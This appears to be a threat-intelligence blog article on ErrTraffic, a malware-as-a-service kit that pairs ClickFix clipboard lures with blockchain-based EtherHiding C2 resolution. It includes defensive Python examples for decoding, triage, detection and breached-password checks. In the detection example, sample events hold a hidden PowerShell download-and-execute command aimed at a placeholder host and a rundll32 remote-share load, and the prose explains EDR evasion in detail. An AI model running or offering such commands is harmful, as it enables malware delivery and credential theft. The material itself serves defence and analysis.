There's a particular kind of dread that sets in when two well understood attacker techniques, each individually annoying but manageable, get packaged together into a single commercial product. That's exactly what's happened with ErrTraffic, a Malware as a Service (MaaS) framework that has spent the past several months quietly fusing the EtherHiding technique with the ClickFix social engineering tactic into one rentable toolkit.
Neither technique is new on its own. What's new is that they're now sold together, supported by a vendor, and actively iterated on based on customer feedback, the same way any other SaaS product evolves.

The product, not the payload
ErrTraffic first surfaced on Russian language cybercrime forums in December 2025, advertised by a threat actor operating under the handle LenAI. It wasn't pitched as malware. It was pitched as infrastructure: a Traffic Distribution System (TDS) that other criminals could rent to deliver whatever payload they wanted.
The pitch was specifically about the delivery mechanism rather than the payload itself, built around generating convincing "fake glitches" on compromised websites: corrupted text, broken CSS, cursor jitter, the visual sense that a page has actually malfunctioned. That sense of urgency is the entire point. A user who believes their browser or system is broken is far more likely to follow on screen instructions to "fix" it.
The pricing tells its own story about how this market works. Early versions sold for around $800. By 2026, monthly subscriptions had risen from $300 to $380, and the full source code climbed from $1,500 to $3,000, reaching $4,500 with lifetime updates included. Subscriptions run on a queue based rental model with a limited number of seats, deliberately restricting access to avoid attracting too much security researcher attention at once. That's a level of operational discipline you don't usually associate with cybercrime tooling, and it's a sign of how mature this segment of the market has become.
ClickFix: turning the user into the delivery mechanism
ClickFix isn't malware. It's a piece of social engineering that exploits a specific blind spot shared by browsers and endpoint detection tools.
The lure can take several forms: a fake CAPTCHA, a fake browser update notice, a fake "missing system font" warning, or a fake Blue Screen of Death. Whatever the dressing, the mechanics are identical. JavaScript on the page silently copies a malicious command to the victim's clipboard using a call like navigator.clipboard.writeText. The visible lure then instructs the user to fix the supposed problem themselves: press Windows key plus R to open the Run dialog, paste the copied text with Ctrl+V, and press Enter.
Here's the part worth dwelling on, because it's the actual technical answer to why this bypasses so much of the modern security stack: how does Win+R running PowerShell bypass what an EDR sees?
Most behavioral detection logic for suspicious PowerShell execution is built around watching what spawns the shell. A browser process spawning PowerShell is treated as inherently suspicious, because that's the classic signature of a drive by download or a malicious script being silently executed by a web page. EDR vendors have spent years tuning detections specifically for "browser process is the parent of a script interpreter."
ClickFix routes around that entirely. The parent process isn't a browser. It's explorer.exe, the Windows shell process that owns the Run dialog. From the EDR's point of view, a user opened Run and typed a command, which is something legitimate users and IT staff do constantly. There's no exploit, no malicious file landing on disk before execution, no anomalous parent child relationship for the EDR to flag. The browser's job ended the moment it wrote to the clipboard, an action that looks completely benign on its own; copying text isn't a security event. The EDR's job effectively never starts, because the process tree it's watching looks like ordinary, human driven command line use.
This is why ClickFix has become so effective so quickly. It doesn't defeat any single control through sophistication. It simply steps outside the assumptions both browser security and EDR behavioral heuristics were built on.
EtherHiding: hiding the resolver, not just the payload
If ClickFix solves the execution problem for attackers, EtherHiding solves the infrastructure problem. So, what is EtherHiding and how does it work?
EtherHiding is a Dead Drop Resolver technique. The core idea is to stop putting C2 domains directly into malicious code and instead store that information inside a smart contract on a public blockchain, most commonly Polygon or BNB Smart Chain. A smart contract is simply a small program deployed on the blockchain that can store and return data when queried. Instead of the injected JavaScript on a compromised site containing a hardcoded domain like bad-domain.example, the script makes a read only call, technically an eth_call, to a specific smart contract address. The contract responds with the data the attacker has stored there: typically the current C2 domain, but in more advanced implementations it can also return the next stage payload, sandbox detection logic, or even the lure's HTML content itself.
The reason this is such an effective evasion technique comes down to two properties of how public blockchains work. First, an eth_call is a read only operation. It costs nothing, leaves no transaction on the blockchain's public ledger, and is functionally indistinguishable from any other application querying blockchain data, which happens constantly across legitimate Web3 applications, wallets, and trading bots. There's no on-chain record connecting the read to anything malicious. Second, there's no central authority over a public blockchain. There's no registrar to send an abuse complaint to and no single point of failure to seize, unlike a traditional domain or hosting provider.
That naturally raises the next question: how can EtherHiding infrastructure be rotated? This is where the technique becomes genuinely powerful from an attacker's perspective rather than just clever. Because the C2 domain itself lives inside the smart contract's data rather than in the injected script, the attacker can update the contract's stored value at any time, pointing it at a brand new domain, without touching a single line of code on the thousands of compromised websites already running the injector. The injection script is permanently configured to query the same contract address; only the data that contract returns changes. One of the clusters tracked in recent research updates its C2 domain roughly once a day this way. Defenders who successfully block or sinkhole today's domain accomplish nothing against tomorrow's, because the resolver mechanism that points to it never had to change.
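As an added example (not code from the article, from ErrTraffic, or from any cited vendor), here is what an analyst sees when the blockchain lookup in an injected script is reproduced offline. The request body is the real JSON-RPC shape of an eth_call; the contract returns an ABI encoded string, which is all the "dead drop" really is. The contract address, function selector, returned value and the snapshot history are placeholders constructed for this example, and the rotation helper at the end shows how a defender who records the resolved value daily can see the rotation described above.

```python
import json

CONTRACT_ADDRESS = "0x" + "00" * 19 + "01"   # placeholder, not a real contract
FUNCTION_SELECTOR = "0xdeadbeef"             # placeholder; a real selector is the first
                                             # 4 bytes of keccak256 of the function signature

def build_eth_call(to: str, selector: str, block: str = "latest") -> dict:
    """JSON-RPC request for a read-only call: no transaction, no gas, no on-chain record."""
    return {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "eth_call",
        "params": [{"to": to, "data": selector}, block],
    }

def abi_encode_string(s: str) -> str:
    """Stand-in for the contract's reply: ABI encoding of one dynamic `string`
    (32-byte offset word, 32-byte length word, data padded to a 32-byte boundary)."""
    data = s.encode()
    padded = data + b"\x00" * (-len(data) % 32)
    offset = (32).to_bytes(32, "big")
    length = len(data).to_bytes(32, "big")
    return "0x" + (offset + length + padded).hex()

def abi_decode_string(result_hex: str) -> str:
    """Decode the `result` field of an eth_call response as a single dynamic string."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(raw[:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode()

def resolve_from_response(response: dict) -> str:
    """Pull the stored value out of a JSON-RPC response dict, surfacing RPC errors."""
    if "error" in response:
        raise RuntimeError(f"eth_call failed: {response['error']}")
    return abi_decode_string(response["result"])

def rotation_points(history):
    """history: list of (timestamp, resolved_value) snapshots taken over time.
    Returns (timestamp, old_value, new_value) for every snapshot where the value changed."""
    changes = []
    for (_, v_prev), (t, v) in zip(history, history[1:]):
        if v != v_prev:
            changes.append((t, v_prev, v))
    return changes

if __name__ == "__main__":
    req = build_eth_call(CONTRACT_ADDRESS, FUNCTION_SELECTOR)
    # Constructed response standing in for what an RPC endpoint would return
    resp = {"jsonrpc": "2.0", "id": 1, "result": abi_encode_string("c2-day1.example")}
    print(json.dumps(req))
    print("contract currently resolves to:", resolve_from_response(resp))
    snaps = [("day1", "c2-day1.example"), ("day2", "c2-day1.example"), ("day3", "c2-day3.example")]
    print("rotations observed:", rotation_points(snaps))
```

The decoder is the useful part for an investigation: once the contract address and selector are lifted from an injected script, the same read the injector performs yields the indicator to block, and a daily snapshot shows how quickly it rotates.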
Two clusters, one framework, a real marketplace underneath
Recent threat intelligence research split observed ErrTraffic activity into two distinct operational clusters, and the distinction is a useful illustration of how MaaS platforms actually fragment in practice.
One cluster, nicknamed "Analytics," appears to be run by a single threat actor who purchased ErrTraffic's source code outright rather than renting it. It relies on one stable smart contract, rotates its C2 domain about once daily, and has been observed exclusively distributing the Vidar infostealer.
The second, nicknamed "Beer" after its consistent use of the .beer top level domain, looks like the actual rental business. Each affiliate appears to get assigned their own dedicated smart contract tied to their own C2 domain and uploads their own choice of payload to the panel. That structure explains why the Beer cluster has been observed distributing such a wide range of malware: Vidar, Stealc, a stealer called Remus, another called Salat, and loaders including SmokeLoader. Each smart contract is effectively a different customer running their own campaign on shared infrastructure, the same logic as any multi tenant SaaS platform, just applied to malware delivery.
Researchers even found WordPress sites independently compromised by both clusters, suggesting genuine competition between separate criminal operators fighting over the same vulnerable infrastructure footprint.

When the lure impersonates the tools researchers actually use
Beyond compromised WordPress sites, the same Beer cluster infrastructure has been observed powering standalone malicious websites built to impersonate legitimate AI platforms, specifically Google's Antigravity tool and ChatGPT.
These aren't compromised legitimate sites. They're freshly registered domains designed from scratch to look like official download pages, almost certainly driven by malvertising rather than any kind of compromise. The Antigravity impersonation site, for instance, presents a multi-OS download page with the right branding and infographics, but every visible download link is a dead, empty anchor tag. The only thing the site actually does is render the ClickFix lure once a visitor lands on it.
The payload differs by lure. The fake Antigravity site's PowerShell command drops and executes an MSI file that ultimately installs the DanaBot malware family. The fake ChatGPT site takes a different evasive route worth its own explanation, because it raises a second question: what is binary bloating and how does it evade sandboxes?
Binary bloating is exactly what it sounds like. Rather than delivering a small, easily analyzed payload, the attacker pads the final executable or its surrounding archive with large amounts of junk data, inflating it to a size that creates real friction for automated analysis. In this campaign, the ChatGPT impersonation site's PowerShell command pulled down an archive exceeding 120 megabytes containing multiple files, eventually delivering a loader called HijackLoader.
The evasion logic works on two fronts. Automated sandboxes and malware analysis pipelines frequently impose practical size and time limits, partly for resource reasons and partly because static analysis tools (disassemblers, signature scanners, and the like) slow down dramatically or simply choke on extremely large files. A 120 megabyte archive can blow straight through default file size thresholds that many automated triage systems use to decide whether something gets a full analysis pass or gets waved through. It's a brute force tactic rather than a clever one, but brute force works precisely because so much of automated defense infrastructure has to draw a line somewhere on file size to remain practical at scale, and attackers know roughly where those lines tend to sit.
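As an added example (not code from the article or from any cited report), here is triage logic that a pipeline can apply to a bloated archive instead of waving it through on size alone. Junk padding has a recognisable shape: it is enormous, it compresses to almost nothing, and a sample of it has near zero entropy, while the real payload is small and dense. The archive is constructed in memory, the 4 MiB sandbox threshold is an assumed figure for illustration, and the 120 megabyte size from the campaign is scaled down to keep the example fast.

```python
import io
import math
import random
import zipfile
from collections import Counter

SIZE_THRESHOLD = 4 * 1024 * 1024   # assumed sandbox cut-off, for illustration only
SAMPLE_BYTES = 64 * 1024           # how much of each member to sample for entropy

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant byte string, 8.0 for uniformly random bytes."""
    if not data:
        return 0.0
    counts = Counter(data)
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def build_bloated_archive(padding_size: int) -> bytes:
    """Constructed sample: a small high-entropy member plus a huge zero-filled filler."""
    rng = random.Random(7)
    payload = bytes(rng.getrandbits(8) for _ in range(4096))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("setup.bin", payload)
        zf.writestr("filler.dat", b"\x00" * padding_size)
    return buf.getvalue()

def triage_archive(blob: bytes) -> dict:
    """Per-member statistics plus a verdict on whether the size comes from padding."""
    members = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            with zf.open(info) as fh:
                sample = fh.read(SAMPLE_BYTES)
            ratio = info.compress_size / info.file_size if info.file_size else 1.0
            ent = shannon_entropy(sample)
            members.append({
                "name": info.filename,
                "uncompressed": info.file_size,
                "ratio": round(ratio, 4),
                "entropy": round(ent, 3),
                # padding: large, compresses extremely well, carries almost no information
                "padding_like": info.file_size >= 1024 * 1024 and ratio < 0.01 and ent < 1.0,
            })
    total = sum(m["uncompressed"] for m in members)
    real = sum(m["uncompressed"] for m in members if not m["padding_like"])
    return {
        "total_uncompressed": total,
        "exceeds_threshold": total > SIZE_THRESHOLD,   # what a size-only gate would see
        "size_without_padding": real,                  # what actually needs analysis
        "members": members,
    }

if __name__ == "__main__":
    report = triage_archive(build_bloated_archive(8 * 1024 * 1024))
    for m in report["members"]:
        print(m)
    print("over size threshold:", report["exceeds_threshold"],
          "| content worth analysing:", report["size_without_padding"], "bytes")
```

The point of the verdict is that a size only gate and a padding aware gate disagree on the same file: the first sees an oversized archive and skips it, the second sees a 4 KB payload wrapped in filler and routes it to full analysis.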
The choice of ChatGPT and Antigravity as lures isn't incidental either. Developers and AI researchers are a deliberately attractive target: they tend to hold elevated system privileges, and the credentials and API tokens they have access to for premium AI platforms carry real resale value on underground markets. A second domain found hosted on the same infrastructure, with a naming pattern referencing tokenized stock trading and decentralized finance, points toward the same operator also going after cryptocurrency wallets and Web3 investors.
A live example: when EtherHiding pointed to GULoader instead of an infostealer
The most useful proof that this combination isn't confined to ErrTraffic specifically came from a separate, very recently documented intrusion. A compromised WordPress site, this time a legitimate small business site in Europe, had been implanted with a backdoor styled closely on ErrTraffic's v3 architecture. The injected script followed the same general playbook: decode an obfuscated Base64 and XOR payload, then call out to a smart contract, in this instance on the BNB Smart Chain Testnet rather than Polygon, to resolve the next stage.
That naturally raises one more question worth answering directly: what is GULoader? GULoader is an in-memory shellcode downloader, frequently used as a delivery stage for a variety of infostealer and remote access trojan families rather than being a complete piece of malware on its own. Its defining trait is that it's built to operate almost entirely in memory and to actively detect and resist sandbox and analysis environments, making it a popular choice specifically as the connective tissue between an initial access technique and whatever final payload an operator actually wants to run.
In this case, the resolved command attempted to launch rundll32.exe pointed at a remote network share, using an ordinal based export call rather than a named function, a classic technique for slipping past file reputation and extension based filtering since the loaded content was never written to local disk as a recognizable executable. Endpoint telemetry confirmed the entire chain back through the Run dialog to the operating system's process creation call, proving conclusively that a human had actually pasted and executed the command rather than any automated exploit or browser triggered download doing it on their behalf. The attempt was ultimately blocked by a behavioral endpoint rule that flagged the unusual combination of a remote network path and an ordinal export call on rundll32.exe, stopping GULoader before it could fully initialize.
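As an added example (not code from the article or from any cited vendor), here is a small rule set run over constructed process-creation events. It serves two passages: the ClickFix mechanics above, where the script interpreter's parent is explorer.exe rather than a browser, so the classic parent-process rule never fires and detection has to fall back to the command line; and the behavioral rule that stopped GULoader here, keyed on rundll32.exe loading from a remote share with an ordinal export. All field names, rule names, sample command lines and the 203.0.113.10 address are constructed for this example.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}

# Command-line fragments typical of a download-and-execute cradle. Any one of them
# in a shell launched from explorer.exe (the Run dialog) is worth an alert even though
# the parent looks like ordinary interactive use.
CRADLE_PATTERNS = [
    re.compile(r"invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b", re.I),
    re.compile(r"-enc(odedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"https?://", re.I),
]

# rundll32 given a UNC path (\\host\share\file) as the DLL and an ordinal (#N) export
RUNDLL32_REMOTE_ORDINAL = re.compile(
    r"rundll32(\.exe)?\s+\\\\[^\s,]+\\[^\s,]+\s*,\s*#\d+", re.I)

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(ev: ProcessEvent) -> list:
    """Return the names of the rules that match this event (empty list if none)."""
    hits = []
    img, parent = basename(ev.image), basename(ev.parent_image)
    if img in SCRIPT_HOSTS and parent in BROWSERS:
        hits.append("browser_spawned_script_host")        # the classic drive-by rule
    if img in SCRIPT_HOSTS and parent == "explorer.exe":
        # Run-dialog launch: the parent is benign, so decide on the command line alone
        if any(p.search(ev.command_line) for p in CRADLE_PATTERNS):
            hits.append("clickfix_run_dialog_cradle")
    if img == "rundll32.exe" and RUNDLL32_REMOTE_ORDINAL.search(ev.command_line):
        hits.append("rundll32_remote_share_ordinal")
    return hits

# Constructed sample telemetry, not real captures
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 'powershell -w hidden -c "iex (iwr http://c2-placeholder.example/x -UseBasicParsing)"'),
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Windows\explorer.exe",
                 r"powershell Get-ChildItem C:\Users\alice\Documents"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "cmd /c whoami"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"C:\Windows\explorer.exe",
                 r"rundll32.exe \\203.0.113.10\share\payload.dll,#1"),
]

def scan(events):
    """Evaluate every event; returns (process name, matched rules) pairs."""
    return [(basename(ev.image), evaluate(ev)) for ev in events]

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_EVENTS):
        print(f"{name:16} {hits or 'clean'}")
```

The second sample event is the case that matters: an interactive PowerShell launch from explorer.exe with a harmless command line stays clean, so the rule does not drown in the everyday Run-dialog use the article describes, while the first event is caught on its content rather than its ancestry.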
What matters here isn't the specific outcome. It's that the chain, EtherHiding resolving a blockchain backed dead drop straight into a ClickFix executed command, worked exactly the way the technique is supposed to, on a completely different blockchain than the one ErrTraffic's documented clusters use, delivering a completely different category of payload. The pattern has already outgrown the original toolkit's branding.
The part that keeps the cycle running
There's a feedback loop sitting underneath all of this that's worth calling out on its own, because it explains why this kind of campaign tends to accelerate rather than plateau over time.
ClickFix infections frequently deliver infostealers, and infostealers don't only harvest banking credentials. They also scoop up content management system logins: WordPress admin panels, cPanel access, and similar. Those harvested credentials then get sold or reused to compromise additional websites, which get loaded up with the next round of ClickFix lures, which infect the next batch of visitors, and the cycle continues.
This isn't a hypothetical pattern. Forensic analysis of an actual ErrTraffic victim site traced its initial compromise directly back to administrator credentials that had almost certainly been stolen by an earlier, entirely separate infostealer infection rather than any technical vulnerability being exploited. A second compromised site's admin credentials had been sitting in a known credential leak database since an infostealer theft eight months prior. The malware campaign is, in a very real sense, partially fueled by the output of its own earlier infections.
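As an added example (not code from the article), here is the check a site owner can run when an administrator password is set or rotated: test it against a breached-password corpus using the k-anonymity range scheme that Have I Been Pwned's Pwned Passwords API uses, where only the first five hex characters of the password's SHA-1 leave the machine and the server returns every suffix it knows for that prefix. The range response below is constructed so the example runs offline; a live check would fetch https://api.pwnedpasswords.com/range/<prefix> and pass the body to the same parser. The sample passwords and counts are made up.

```python
import hashlib

def sha1_split(password: str):
    """Split the uppercase hex SHA-1 into the 5-char prefix sent out and the 35-char suffix kept local."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]

def parse_range_response(text: str) -> dict:
    """Range responses are lines of 'SUFFIX:COUNT'; blank or malformed lines are skipped."""
    seen = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        suffix, count = line.split(":", 1)
        seen[suffix.strip().upper()] = int(count)
    return seen

def breach_count(password: str, fetch_range) -> int:
    """fetch_range(prefix) returns the response text. Result: how often the password
    appears in the corpus, 0 if it has never been seen."""
    prefix, suffix = sha1_split(password)
    return parse_range_response(fetch_range(prefix)).get(suffix, 0)

# Constructed offline stand-in for the API: it knows one leaked password and nothing else.
_LEAKED = "Password123"
_LEAKED_PREFIX, _LEAKED_SUFFIX = sha1_split(_LEAKED)

def fake_fetch_range(prefix: str) -> str:
    if prefix == _LEAKED_PREFIX:
        return f"{_LEAKED_SUFFIX}:1234\r\n{'0' * 34}A:1"
    return f"{'0' * 34}B:1"

def audit_admins(accounts: dict, fetch_range=fake_fetch_range) -> dict:
    """accounts: {username: password}. Returns only the users whose password is in the corpus,
    mapped to the number of times it has been seen."""
    flagged = {}
    for user, password in accounts.items():
        count = breach_count(password, fetch_range)
        if count:
            flagged[user] = count
    return flagged

if __name__ == "__main__":
    admins = {"wp_admin": "Password123", "editor": "correct horse battery staple 9x!"}
    print(audit_admins(admins))   # only wp_admin should be flagged
```

Pair the check with rotation of any flagged credential and with multi-factor authentication on the admin panel: a password that already sits in a stealer log or leak corpus is exactly the one that gets replayed against the site next.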
Why this combination matters more than the toolkit name
It's tempting to file ErrTraffic away as just another malware brand to track and move on. That undersells what's actually happening here.
EtherHiding and ClickFix solve two completely different problems for an attacker, and they happen to sit at two different layers of the typical defensive stack. ClickFix defeats the browser and the EDR's behavioral assumptions by making the user the one who triggers execution, with no exploit and no anomalous parent process in sight. EtherHiding defeats domain and IP based blocking by removing the C2 address from the code entirely and storing it somewhere with no central authority and no transaction trail to follow. Individually, defenders have reasonably workable answers to each. Stacked together inside a single rentable product, with a support channel and a subscription model behind it, they cover for each other's weak points in a way that's considerably harder to unwind with any single control.
The realistic expectation going forward isn't that ErrTraffic specifically gets shut down and the problem goes away. It's that this particular combination of techniques, blockchain backed dead drop resolution feeding directly into clipboard driven, user executed commands, keeps reappearing under new branding, on different blockchains, carrying different final payloads. The toolkit name is almost beside the point. The techniques are the thing actually worth tracking.
References
- Sekoia TDR, "Unveiling ErrTraffic: inside a growing ClickFix malware distribution framework" — https://blog.sekoia.io/unveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework/
- LevelBlue SpiderLabs, "Err, Hiding and Seek: How ErrTraffic v3 Leverages EtherHiding in ClickFix Campaign" — https://www.levelblue.com/blogs/spiderlabs-blog/err-hiding-and-seek-how-errtraffic-v3-leverages-etherhiding-in-clickfix-campaign
- HudsonRock / Infostealers.com, "The Industrialization of ClickFix: Inside ErrTraffic" — https://www.infostealers.com/article/the-industrialization-of-clickfix-inside-errtraffic/
- GBHackers, "WordPress Sites Hacked to Deliver GULoader" — https://gbhackers.com/wordpress-sites-to-deliver-guloader/
- Sekoia TDR, "ClearFake's New Widespread Variant: Increased Web3 Exploitation for Malware Delivery" — https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
- Guardio Labs, "EtherHiding: Hiding Web2 Malicious Code in Web3 Smart Contracts" — https://guard.io/labs/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts
